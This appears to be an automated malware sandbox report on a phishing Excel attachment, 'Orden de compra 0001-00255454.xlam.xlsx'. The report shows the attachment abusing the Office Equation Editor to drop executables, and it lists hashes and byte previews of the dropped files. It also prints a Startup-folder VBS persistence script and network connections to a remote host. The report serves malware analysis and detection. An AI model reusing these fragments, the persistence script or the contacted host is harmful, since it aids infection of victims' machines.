Preview:	<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\T76434567000[1].exe

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1357312
Entropy (8bit):	6.788018216695586
Encrypted:	false
SSDEEP:	24576:uqDEvCTbMWu7rQYlBQcBiT6rprG8aj5OV969dMSEOQOTxK:uTvC/MTQYxsWR7aj5ODudMSEO
MD5:	FBCCDD35EE6DCCADAEAA69E37FBBD171
SHA1:	D076D0BE3A846AFCE258DEF238BF7EF5FE5CACD5
SHA-256:	A0EAE98F6ADB6DD377456733EEDC98A453211B456E7F934818B584CCC74B1DE3
SHA-512:	A106A75FFC8042ECE8AC3E32F1BF2534C56C917F1540288C9685FDB9B832BE8CE8DAD4CDE914165C477A3ED0153FEFC92E3ED1119B8EED340E85D0A3538BF791
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L...r.5f..........".................w.............@.......................................@...@.......@.....................d...\|....@...J.......................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc....J...@...L..................@..@.reloc...u.......v...@..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\atule

Download File

Process:	C:\Users\user\AppData\Roaming\negrett.exe
File Type:	ASCII text, with very long lines (29744), with no line terminators
Category:	dropped
Size (bytes):	29744
Entropy (8bit):	3.561321965091604
Encrypted:	false
SSDEEP:	768:wiTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbQE+IrCim4vfF3if6gyO:wiTZ+2QoioGRk6ZklputwjpjBkCiw2Ru
MD5:	518C70484039975D7C4CDF9C2801944B
SHA1:	7F0E0A4CE1EECC2C0ADC2475D1DB65048D2789DB
SHA-256:	3F43AC964B27B4A9E2EE511E5309EBEA2D3EFEE90AF5C95BD4136DE09A37D741
SHA-512:	F9B4A980E10B4FAA4052C1118DB3BF16C394D6BCF7963CECF91105F682C808898EEFF5FF717D735B3D56A76822C9552AD09A749BDD303AA1865349B65261599D
Malicious:	false
Reputation:	low
Preview:	048B4C24088B008B093BC8760483C8FFC31BC0F7D8C38B0x558bec81eccc0200005657b86b00000066894584b96500000066894d86ba7200000066895588b86e0000006689458ab96500000066894d8cba6c0000006689558eb83300000066894590b93200000066894d92ba2e00000066895594b86400000066894596b96c00000066894d98ba6c0000006689559a33c06689459cb96e00000066898d44ffffffba7400000066899546ffffffb86400000066898548ffffffb96c00000066898d4affffffba6c0000006689954cffffffb82e0000006689854effffffb96400000066898d50ffffffba6c00000066899552ffffffb86c00000066898554ffffff33c966898d56ffffffba75000000668955d0b873000000668945d2b96500000066894dd4ba72000000668955d6b833000000668945d8b93200000066894ddaba2e000000668955dcb864000000668945deb96c00000066894de0ba6c000000668955e233c0668945e4b96100000066898d68ffffffba640000006689956affffffb8760000006689856cffffffb96100000066898d6effffffba7000000066899570ffffffb86900000066898572ffffffb93300000066898d74ffffffba3200000066899576ffffffb82e00000066898578ffffffb96400000066898d7affffffba6c0000006689957cffffffb86c00000066

C:\Users\user\AppData\Local\Temp\aut187.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\negrett.exe
File Type:	data
Category:	dropped
Size (bytes):	228236
Entropy (8bit):	7.978584093261845
Encrypted:	false
SSDEEP:	6144:j0PAE/6C+dNnxdEK2+CpQv8tvmUuh8ACqCi7cxFALh:wPAE/bmnDb2D9mReFALh
MD5:	F1180A55F1DAC9F9BB49C5DDB5713F1B
SHA1:	1F23E1CA54E4C92482B9E22C86E7A856F8D91C31
SHA-256:	9AB94DB31D4F78D1343D0FA8E82CA9092308F511D487290F7B5FF4A1E29A88BD
SHA-512:	B08013D12A5033F9EB3D991859D491B008FCDD6CD91A81B7240AFA69638424A787D94D0372F92F020E8B3D887BC905F5585E521F6399CCF5573D1DC4A3BF6E0F
Malicious:	false
Reputation:	low
Preview:	EA06......;SZ..aI....N^..K..&s)..B.Q&.z$.5....0..iR.R. .....gh.8Oj..T..C.F0.+.....K..Z<.-..eq.UJCY...R.tf.F.F$r....f..k...=....3Q.m..I.yj...6....f......vu?...Of....'.......R..~...l.N..=.....S"...R[V... ...n....T1K.k...)4.T.(.9...C..g.z&..5.h& ..o>.8J.8..8..... ..0...3<...Rm7.M.S]}.eI....I.J..q.U~.F...b....l.c2...2I..AR...}.L..kH.l.....&..9....E...m...>`.8S: ..\|.p.R.s.....t.L%1..NK@..T.P.....p.G.y.L.Qit.m'..`@...eI..@... ....L._[..;........X.....B.7.....T,....h...?...../6..).^6..].JqU....O.V&.O....Kfx+.+...b??.G....b..^ejg.....<.-.....5.e..v...^......x..z.O...X.......&..$.[.\|)_[W".4.L..............."..4.J._.3Mn.iy..hs./..E.D9.I..S.Oi<.".;.N.3lw.c...(Tn%2a......+.K.k..~.W.<....`..q..m... ..q:d...,.{tw..Q&.{.....@......]......2.U@F..6.o..(7.6.m<...J.".6.xf>jNs....f.J]....L6...........R[8.s.+..m=..v.5...dS.&C...L...<. ..hT...#L.]-..\|.6.R..y.....Z.4i....Z..~m..'..>\i...\|.....v....sn...o.R.p-..L'...... ..P....:...D.....aL..\|.f..D...._......k].A].

C:\Users\user\AppData\Local\Temp\aut1C6.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\negrett.exe
File Type:	data
Category:	dropped
Size (bytes):	9998
Entropy (8bit):	7.5935274912491515
Encrypted:	false
SSDEEP:	192:m+cKgzEeSCO8vvL3c04qyed8ipotr9EVgNcvWiN/81gokDWxkg10Gg:97gQeSCOO3nyed8My9EVgNcvR2yg10Gg
MD5:	D4675AE4BCED0DBEEDB90230CF2B6179
SHA1:	85785B7167135E7683795A6C56282693D7C15992
SHA-256:	94955C3E9542147426F2538F79304E8BCAAF7D7FA0FA4EB6BEA54D790D73C9B6
SHA-512:	005AC8D4FE05C07418D47F1130ED0CAC6776649FAD2CF0554BF6A608E7900E876083D0F3287D1F98615A6DDE0031BDD7A59F07F4CE7529B58B5A7431DA1CEA32
Malicious:	false
Reputation:	low
Preview:	EA06..t0.M'.)..e4.N'.).......T9..l.0L.s.5..3..s.4.8.......k8.Yls....c..&S...k6...S....1.L&.i..i5.M,S....K.@...7...p. ....P.o...m.X.V........9....3...f....s2.Xf@.]..g3@..h.m.M.......8.l..6.....a........i4........g3Y...c ._..k4...d....H, ......Ac.H..g...(.F..=d....>....C`....@02..N@...u......Y..ab.M.]>.$....M.x>;$....N.j.;%....X.j.;%......j.;,....P'.b.5... .^..f./Z..@F.6.z..G......`......i..G../Z...zqd...l.;.........\|......7...}3{(........;^..l =..p.........3p.o....,.......x.....H<.lX.:...b.....,. ...2...f.[...K.)....b..i\|v F......X......`....,.9....5...._..l......>K.....ir.e....[4..d..f.y.....,.....S >..p...........s9.... !..Y....f...ja4....ea.h,.p.....,.a8.,..3........f.....f ....,j.0..&...J......f ....6K%.ke..f....L..;2.X...4.Y.V@.Fn.....f@....l..05.....!;3.X...c )D.g6... ...'&`....,f.6..&....r...Brh.....l...i2...B....@.......d.L.`!.....P...@X5d..lSK...9...!;5.X...cVY......'.B...,vl.!..>.a..l...M..@...X...b.M&.X..B.a.Q...sp..X..9..o5..f.!...,vn......d...

C:\Users\user\AppData\Local\Temp\aut3C55.tmp

Download File

Process:	C:\Users\user\AppData\Local\directory\name.exe
File Type:	data
Category:	dropped
Size (bytes):	228236
Entropy (8bit):	7.978584093261845
Encrypted:	false
SSDEEP:	6144:j0PAE/6C+dNnxdEK2+CpQv8tvmUuh8ACqCi7cxFALh:wPAE/bmnDb2D9mReFALh
MD5:	F1180A55F1DAC9F9BB49C5DDB5713F1B
SHA1:	1F23E1CA54E4C92482B9E22C86E7A856F8D91C31
SHA-256:	9AB94DB31D4F78D1343D0FA8E82CA9092308F511D487290F7B5FF4A1E29A88BD
SHA-512:	B08013D12A5033F9EB3D991859D491B008FCDD6CD91A81B7240AFA69638424A787D94D0372F92F020E8B3D887BC905F5585E521F6399CCF5573D1DC4A3BF6E0F
Malicious:	false
Reputation:	low
Preview:	EA06......;SZ..aI....N^..K..&s)..B.Q&.z$.5....0..iR.R. .....gh.8Oj..T..C.F0.+.....K..Z<.-..eq.UJCY...R.tf.F.F$r....f..k...=....3Q.m..I.yj...6....f......vu?...Of....'.......R..~...l.N..=.....S"...R[V... ...n....T1K.k...)4.T.(.9...C..g.z&..5.h& ..o>.8J.8..8..... ..0...3<...Rm7.M.S]}.eI....I.J..q.U~.F...b....l.c2...2I..AR...}.L..kH.l.....&..9....E...m...>`.8S: ..\|.p.R.s.....t.L%1..NK@..T.P.....p.G.y.L.Qit.m'..`@...eI..@... ....L._[..;........X.....B.7.....T,....h...?...../6..).^6..].JqU....O.V&.O....Kfx+.+...b??.G....b..^ejg.....<.-.....5.e..v...^......x..z.O...X.......&..$.[.\|)_[W".4.L..............."..4.J._.3Mn.iy..hs./..E.D9.I..S.Oi<.".;.N.3lw.c...(Tn%2a......+.K.k..~.W.<....`..q..m... ..q:d...,.{tw..Q&.{.....@......]......2.U@F..6.o..(7.6.m<...J.".6.xf>jNs....f.J]....L6...........R[8.s.+..m=..v.5...dS.&C...L...<. ..hT...#L.]-..\|.6.R..y.....Z.4i....Z..~m..'..>\i...\|.....v....sn...o.R.p-..L'...... ..P....:...D.....aL..\|.f..D...._......k].A].

C:\Users\user\AppData\Local\Temp\aut3C94.tmp

Download File

Process:	C:\Users\user\AppData\Local\directory\name.exe
File Type:	data
Category:	dropped
Size (bytes):	9998
Entropy (8bit):	7.5935274912491515
Encrypted:	false
SSDEEP:	192:m+cKgzEeSCO8vvL3c04qyed8ipotr9EVgNcvWiN/81gokDWxkg10Gg:97gQeSCOO3nyed8My9EVgNcvR2yg10Gg
MD5:	D4675AE4BCED0DBEEDB90230CF2B6179
SHA1:	85785B7167135E7683795A6C56282693D7C15992
SHA-256:	94955C3E9542147426F2538F79304E8BCAAF7D7FA0FA4EB6BEA54D790D73C9B6
SHA-512:	005AC8D4FE05C07418D47F1130ED0CAC6776649FAD2CF0554BF6A608E7900E876083D0F3287D1F98615A6DDE0031BDD7A59F07F4CE7529B58B5A7431DA1CEA32
Malicious:	false
Preview:	EA06..t0.M'.)..e4.N'.).......T9..l.0L.s.5..3..s.4.8.......k8.Yls....c..&S...k6...S....1.L&.i..i5.M,S....K.@...7...p. ....P.o...m.X.V........9....3...f....s2.Xf@.]..g3@..h.m.M.......8.l..6.....a........i4........g3Y...c ._..k4...d....H, ......Ac.H..g...(.F..=d....>....C`....@02..N@...u......Y..ab.M.]>.$....M.x>;$....N.j.;%....X.j.;%......j.;,....P'.b.5... .^..f./Z..@F.6.z..G......`......i..G../Z...zqd...l.;.........\|......7...}3{(........;^..l =..p.........3p.o....,.......x.....H<.lX.:...b.....,. ...2...f.[...K.)....b..i\|v F......X......`....,.9....5...._..l......>K.....ir.e....[4..d..f.y.....,.....S >..p...........s9.... !..Y....f...ja4....ea.h,.p.....,.a8.,..3........f.....f ....,j.0..&...J......f ....6K%.ke..f....L..;2.X...4.Y.V@.Fn.....f@....l..05.....!;3.X...c )D.g6... ...'&`....,f.6..&....r...Brh.....l...i2...B....@.......d.L.`!.....P...@X5d..lSK...9...!;5.X...cVY......'.B...,vl.!..>.a..l...M..@...X...b.M&.X..B.a.Q...sp..X..9..o5..f.!...,vn......d...

C:\Users\user\AppData\Local\Temp\aut761A.tmp

Download File

Process:	C:\Users\user\AppData\Local\directory\name.exe
File Type:	data
Category:	dropped
Size (bytes):	228236
Entropy (8bit):	7.978584093261845
Encrypted:	false
SSDEEP:	6144:j0PAE/6C+dNnxdEK2+CpQv8tvmUuh8ACqCi7cxFALh:wPAE/bmnDb2D9mReFALh
MD5:	F1180A55F1DAC9F9BB49C5DDB5713F1B
SHA1:	1F23E1CA54E4C92482B9E22C86E7A856F8D91C31
SHA-256:	9AB94DB31D4F78D1343D0FA8E82CA9092308F511D487290F7B5FF4A1E29A88BD
SHA-512:	B08013D12A5033F9EB3D991859D491B008FCDD6CD91A81B7240AFA69638424A787D94D0372F92F020E8B3D887BC905F5585E521F6399CCF5573D1DC4A3BF6E0F
Malicious:	false
Preview:	EA06......;SZ..aI....N^..K..&s)..B.Q&.z$.5....0..iR.R. .....gh.8Oj..T..C.F0.+.....K..Z<.-..eq.UJCY...R.tf.F.F$r....f..k...=....3Q.m..I.yj...6....f......vu?...Of....'.......R..~...l.N..=.....S"...R[V... ...n....T1K.k...)4.T.(.9...C..g.z&..5.h& ..o>.8J.8..8..... ..0...3<...Rm7.M.S]}.eI....I.J..q.U~.F...b....l.c2...2I..AR...}.L..kH.l.....&..9....E...m...>`.8S: ..\|.p.R.s.....t.L%1..NK@..T.P.....p.G.y.L.Qit.m'..`@...eI..@... ....L._[..;........X.....B.7.....T,....h...?...../6..).^6..].JqU....O.V&.O....Kfx+.+...b??.G....b..^ejg.....<.-.....5.e..v...^......x..z.O...X.......&..$.[.\|)_[W".4.L..............."..4.J._.3Mn.iy..hs./..E.D9.I..S.Oi<.".;.N.3lw.c...(Tn%2a......+.K.k..~.W.<....`..q..m... ..q:d...,.{tw..Q&.{.....@......]......2.U@F..6.o..(7.6.m<...J.".6.xf>jNs....f.J]....L6...........R[8.s.+..m=..v.5...dS.&C...L...<. ..hT...#L.]-..\|.6.R..y.....Z.4i....Z..~m..'..>\i...\|.....v....sn...o.R.p-..L'...... ..P....:...D.....aL..\|.f..D...._......k].A].

C:\Users\user\AppData\Local\Temp\aut77DF.tmp

Download File

Process:	C:\Users\user\AppData\Local\directory\name.exe
File Type:	data
Category:	dropped
Size (bytes):	9998
Entropy (8bit):	7.5935274912491515
Encrypted:	false
SSDEEP:	192:m+cKgzEeSCO8vvL3c04qyed8ipotr9EVgNcvWiN/81gokDWxkg10Gg:97gQeSCOO3nyed8My9EVgNcvR2yg10Gg
MD5:	D4675AE4BCED0DBEEDB90230CF2B6179
SHA1:	85785B7167135E7683795A6C56282693D7C15992
SHA-256:	94955C3E9542147426F2538F79304E8BCAAF7D7FA0FA4EB6BEA54D790D73C9B6
SHA-512:	005AC8D4FE05C07418D47F1130ED0CAC6776649FAD2CF0554BF6A608E7900E876083D0F3287D1F98615A6DDE0031BDD7A59F07F4CE7529B58B5A7431DA1CEA32
Malicious:	false
Preview:	EA06..t0.M'.)..e4.N'.).......T9..l.0L.s.5..3..s.4.8.......k8.Yls....c..&S...k6...S....1.L&.i..i5.M,S....K.@...7...p. ....P.o...m.X.V........9....3...f....s2.Xf@.]..g3@..h.m.M.......8.l..6.....a........i4........g3Y...c ._..k4...d....H, ......Ac.H..g...(.F..=d....>....C`....@02..N@...u......Y..ab.M.]>.$....M.x>;$....N.j.;%....X.j.;%......j.;,....P'.b.5... .^..f./Z..@F.6.z..G......`......i..G../Z...zqd...l.;.........\|......7...}3{(........;^..l =..p.........3p.o....,.......x.....H<.lX.:...b.....,. ...2...f.[...K.)....b..i\|v F......X......`....,.9....5...._..l......>K.....ir.e....[4..d..f.y.....,.....S >..p...........s9.... !..Y....f...ja4....ea.h,.p.....,.a8.,..3........f.....f ....,j.0..&...J......f ....6K%.ke..f....L..;2.X...4.Y.V@.Fn.....f@....l..05.....!;3.X...c )D.g6... ...'&`....,f.6..&....r...Brh.....l...i2...B....@.......d.L.`!.....P...@X5d..lSK...9...!;5.X...cVY......'.B...,vl.!..>.a..l...M..@...X...b.M&.X..B.a.Q...sp..X..9..o5..f.!...,vn......d...

C:\Users\user\AppData\Local\Temp\nonhazardousness

Download File

Process:	C:\Users\user\AppData\Roaming\negrett.exe
File Type:	data
Category:	dropped
Size (bytes):	229888
Entropy (8bit):	7.853527489682686
Encrypted:	false
SSDEEP:	6144:odtxFqcDNpdmmp0IrlESm1KN0uMJQ3NJnEI/X0SEL:aFjJpdoQWSQKcJQ9NZEL
MD5:	CD95747202E22552AF28CF9D1B68988C
SHA1:	76DB6EDB8D98BD729ECC3A5B4A8C9419B40CDC8E
SHA-256:	CF71A48EA30F65F3C0F9F72774960C557D33C9C26A66CE31ACE95826C68F5149
SHA-512:	E0892060E7734CBF6D2DA1DA6E4B7CF743138D73A7A54985ADE51937ADCFF551FD300792E1FD4A5178A87AF4B75A8FC2AC4039952718406C62B76C8214228B3B
Malicious:	false
Preview:	.h.5WF0I7O7D.JK.8328JOB.D57D2J5TF0I3O7D4RJK98328JOBFD57D2J5.F0I=P.J4.C...2~.k./7.G6]-G5+.R!Y+@r(..JF\.#!b..f.)].PzK=C.O7D4RJKQ(...;.<j5.IhC.KfeO7.>.:?..5.I.L.;.<.5.Iv.$KH7.7.l^:.#.5..HL.;.<.-V_hC.KTF0I3O7D4RJK9832[B.'FD57.wJ5.G4IG.7.4RJK9832.JlCME<7D.K5T.1I3O7D..JK9(328.NBFDu7D"J5TD0I6O7D4RJK<8328JOBF.67D6J5.}2I1O7.4RZK9(328J_BFT57D2J5DF0I3O7D4RJK.-12hJOBF$77.RK5TF0I3O7D4RJK98328JOBFD57..K5HF0I3O7D4RJK98328JOBFD57D2J5.K2IsO7D4RJK98328.NB.E57D2J5TF0I3O7D4RJK98328JOBh0PO02J5L.1I3_7D4.KK9<328JOBFD57D2J5tF0).=S%@3JK.U328.NBF*57D.K5TF0I3O7D4RJKy83r...6'D57..J5Tf2I3Y7D4XHK98328JOBFD57.2J.z4C;PO7D.2KK9X128(NBFd77D2J5TF0I3O7DtRJ.98328JOBFD57D2J5TF0I3O7D4RJK98328JOBFD57D2J5TF0I3O7D4RJK98328JOBFD57D2J5TF0I3O7D4RJK98328JOBFD57D2J5TF0I3O7D4RJK98328JOBFD57D2J5TF0I3O7D4RJK98328JOBFD57D2J5TF0I3O7D4RJK98328JOBFD57D2J5TF0I3O7D4RJK98328JOBFD57D2J5TF0I3O7D4RJK98328JOBFD57D2J5TF0I3O7D4RJK98328JOBFD57D2J5TF0I3O7D4RJK98328JOBFD57D2J5TF0I3O7D4RJK98328JOBFD57D2J5TF0I3O7D4RJK98328JOBFD57D2J5TF0I3O7D4RJK9832

C:\Users\user\AppData\Local\Temp\~$imgs.xlsx

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fV:vBFFGS
MD5:	797869BB881CFBCDAC2064F92B26E46F
SHA1:	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
SHA-256:	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
SHA-512:	1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
Malicious:	false
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\user\AppData\Local\directory\name.exe

Download File

Process:	C:\Users\user\AppData\Roaming\negrett.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	109360640
Entropy (8bit):	7.999114117008018
Encrypted:	true
SSDEEP:	98304:mjTQYxsWRy8DIMSEOC9hd2pqP5MuerTQRXtb6JCJm:m3dxfiMzF2pqhZrK
MD5:	CF439A4CF698F8D15901A3CAA5F503FE
SHA1:	B31BEE62A6893370C78F8A7D92319180E1201FF8
SHA-256:	08934CC50B19DB7894D18CE045CFF85D884BA099801055D5062A667D4131C9B7
SHA-512:	2A1EBE1C4673AC2F626F1E9CA8E436D8B25EE7903EDB040B5A654114B7869626304238ED8C75EF00C52A25BE8D83632A78DE087BE7BA68B76D6D9CDFFACCF379
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L...r.5f..........".................w.............@.......................................@...@.......@.....................d...\|....@...J.......................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc....J...@...L..................@..@.reloc...u.......v...@..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

Download File

Process:	C:\Users\user\AppData\Local\directory\name.exe
File Type:	data
Category:	dropped
Size (bytes):	268
Entropy (8bit):	3.432515153875934
Encrypted:	false
SSDEEP:	6:DMM8lfm3OOQdUfcltr1UEZ+lX1Al1AE6nriIM8lfQVn:DsO+vNlZ1Q1A1z4mA2n
MD5:	56B963F73C0E43390FF3FF4D7A017676
SHA1:	3B13AC1CF25CDDF48309FC03DAE0C21E501BE72D
SHA-256:	894FD00EC8DF7058794232AEEB64467BC91FE4009F18FA1407E09E92444A9EE0
SHA-512:	38D55BAD2C2EB6C764D036238AC2E220B9444C98F41857799C2316B25AC8BB6C4500E43D362DFFFDF7583858D7C553CF2F11D38962F0BBEC7618B6FA6C71F9F8
Malicious:	true
Preview:	S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.d.i.r.e.c.t.o.r.y.\.n.a.m.e...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

C:\Users\user\AppData\Roaming\negrett.exe

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1357312
Entropy (8bit):	6.788018216695586
Encrypted:	false
SSDEEP:	24576:uqDEvCTbMWu7rQYlBQcBiT6rprG8aj5OV969dMSEOQOTxK:uTvC/MTQYxsWR7aj5ODudMSEO
MD5:	FBCCDD35EE6DCCADAEAA69E37FBBD171
SHA1:	D076D0BE3A846AFCE258DEF238BF7EF5FE5CACD5
SHA-256:	A0EAE98F6ADB6DD377456733EEDC98A453211B456E7F934818B584CCC74B1DE3
SHA-512:	A106A75FFC8042ECE8AC3E32F1BF2534C56C917F1540288C9685FDB9B832BE8CE8DAD4CDE914165C477A3ED0153FEFC92E3ED1119B8EED340E85D0A3538BF791
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L...r.5f..........".................w.............@.......................................@...@.......@.....................d...\|....@...J.......................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc....J...@...L..................@..@.reloc...u.......v...@..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\~$Orden de compra 0001-00255454.xlam.xls

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fV:vBFFGS
MD5:	797869BB881CFBCDAC2064F92B26E46F
SHA1:	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
SHA-256:	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
SHA-512:	1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
Malicious:	false
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\user\Desktop\~$Orden de compra 0001-00255454.xlam.xlsx

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fV:vBFFGS
MD5:	797869BB881CFBCDAC2064F92B26E46F
SHA1:	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
SHA-256:	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
SHA-512:	1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
Malicious:	false
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Static File Info

General

File type:	Microsoft Excel 2007+
Entropy (8bit):	7.99835331125079
TrID:	Excel Microsoft Office Open XML Format document (40004/1) 83.33% ZIP compressed archive (8000/1) 16.67%
File name:	Orden de compra 0001-00255454.xlam.xlsx
File size:	718'272 bytes
MD5:	a2e67a3d40ebd7f8872ebb1dda01aba9
SHA1:	27feddfa7d771ff519757beaac8c974330e14e1d
SHA256:	5242cb2077f21596ec657daf5b6c45087259b85708f959f22b2490d1a381dd36
SHA512:	fcfba9a8f909a1aeeb04c342840c6a2f61372d499841394b4d4d266e5589647fe6c1197d004b73a3b988c12f0bc3620c22715fcd094a5f678d1a882ac963ded0
SSDEEP:	12288:CrGgQXUKPBgmjlmVHfJprHevIGF3ZIM7NWSgCRIf0jKH2t8EgfWEicCokPyw58qs:uhKPB1U5eg6ZL7NWSV3gfkJokPywLB6/
TLSH:	5EE433874EB21459EF898511C296AC3AA27F333FDA4013F729FFCB25452A489C1ED746
File Content Preview:	PK...........XOZ]n....E.......[Content_Types].xmlUT...d.5fd.5fd.5f...n.0..........t.b(......@...%&V#K......v.`...Ar.a..~..wz..\|..L..Z]V.U`0...........!X.1`.6H.......&!.R..V-s...L..P.....c...3/t.........610....P7.{....b...['........ZAJ..`..U..@.8.;.6..NJ

File Icon


Icon Hash:	2562ab89a7b7bfbf

Static OLE Info

General

Document Type:	OpenXML
Number of OLE Files:	1

OLE File "Orden de compra 0001-00255454.xlam.xlsx"

Indicators

Has Summary Info:
Application Name:
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	False

Summary

Author:	Mancilla, Jesus
Last Saved By:	USER
Total Edit Time:	0
Create Time:	2022-08-10T18:51:50Z
Last Saved Time:	2023-08-08T20:02:56Z
Creating Application:	Microsoft Excel
Security:	0

Document Summary

Thumbnail Scaling Desired:	false
Company:
Contains Dirty Links:	false
Shared Document:	false
Changed Hyperlinks:	false
Application Version:	16.0300

Streams

Stream Path: \x1OLE10NaTIVE, File Type: data, Stream Size: 1019488

General
Stream Path:	\x1OLE10NaTIVE
CLSID:
File Type:	data
Stream Size:	1019488
Entropy:	5.890458556459559
Base64 Encoded:	False
Data ASCII:	. y . . . . . \| 1 S . . + . . s b B > U . . 4 . A ] 3 2 . D . A 9 h . . . R I t . 9 . i X I ? . x . M ] B . . 4 \| . . . V / q Y * . c [ 2 ^ 0 ! P g & ! L U . H . _ b s y . ' . . b J 5 & [ . . Z # . K . , . R \| . N @ p e y s { # ^ ; f _ x W ; ! % - . ~ u . R ! . ] H S . . _ ? . . . . ~ ) . . . \| M t U H + . { ^ b . W G % M . = . 7 . . . . N Z 4 H c " . . e . . / % \\ F . D . s . z ~ - . K B ' # . a X 8 . . Y < H . k . 3 . % . Q - R . . \\ u I $ 2 . 6 . u 6 4 s 5 T . . _ T i k . X . . ' J . . e u L e P .
Data Raw:	0e 79 d6 03 02 94 a2 18 86 c7 01 08 9d 8f be 7c 31 f2 fd 81 c6 c0 8b 53 02 8b 1e 8b 2b be c8 04 04 73 81 c6 e8 62 42 8d 8b 3e 55 ff d7 05 de a3 cc 34 05 41 5d 33 cb ff e0 32 1d ca 44 00 ae 41 e8 82 e5 c6 39 68 1f 9e da 0d b4 a8 01 95 52 49 74 e9 1a 39 ed b0 88 dd d4 2e 88 da 69 58 49 94 3f 04 be c8 c9 f1 fe 91 78 0e 4d cc 5d 42 0a f5 01 a0 cc 34 93 ca 7c c9 11 cf 11 a5 98 7f 56 2f

Stream Path: kIGXMKpAnNtXCm1GrVwWIsB0Ud5, File Type: empty, Stream Size: 0

General
Stream Path:	kIGXMKpAnNtXCm1GrVwWIsB0Ud5
CLSID:
File Type:	empty
Stream Size:	0
Entropy:	0.0
Base64 Encoded:	False
Data ASCII:
Data Raw:

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 4, 2024 10:09:29.019311905 CEST	49163	80	192.168.2.22	38.242.255.115
May 4, 2024 10:09:29.331157923 CEST	80	49163	38.242.255.115	192.168.2.22
May 4, 2024 10:09:29.331232071 CEST	49163	80	192.168.2.22	38.242.255.115
May 4, 2024 10:09:29.331490993 CEST	49163	80	192.168.2.22	38.242.255.115
May 4, 2024 10:09:29.643115044 CEST	80	49163	38.242.255.115	192.168.2.22
May 4, 2024 10:09:29.643255949 CEST	80	49163	38.242.255.115	192.168.2.22
May 4, 2024 10:09:29.643333912 CEST	49163	80	192.168.2.22	38.242.255.115
May 4, 2024 10:09:29.651585102 CEST	49164	443	192.168.2.22	38.242.255.115
